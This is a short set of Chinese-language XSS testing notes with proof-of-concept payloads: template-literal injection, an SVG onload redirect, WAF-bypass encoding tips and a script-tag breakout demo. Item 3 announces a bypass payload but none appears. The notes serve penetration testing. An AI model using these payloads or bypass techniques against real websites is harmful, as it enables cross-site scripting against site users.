1.当某参数输出的值在JS中被反引号包囊,通过${ }可以执行javascript
<script>var a=`Hello${alert(1)}`</script>
2.SVG中的测试XSS
<?xml version="1.0" encoding="UTF-8" standalone="no"?><svg onload="window.location='https://www.baidu.com'"xmlns="http://www.w3.org/2000/svg"></svg>
3.不允许使用函数执行的WAF可尝试如下payload绕过
4.在测试中也可以尝试使用编码绕过,多重url编码、HTML实体编码、json中使用Unicode、html编码,或者一些字符拼接。或者使用回车;换行 绕过 某些WAF \r\n可以实现绕过
payload:
XSS测试中的HTML标签,JS事件,Payload往往需要进行fuzz,此时字典就显得尤为关键!
<script>var a = "123\"alert(1);//";</script><script>var a = "123\alert(2);//";</script><script>var a = "123\</script><script>alert(3);//";</script>最后3会显示。 2显示不了,因为第一个script是错误的。 第一个的换行姿不对。
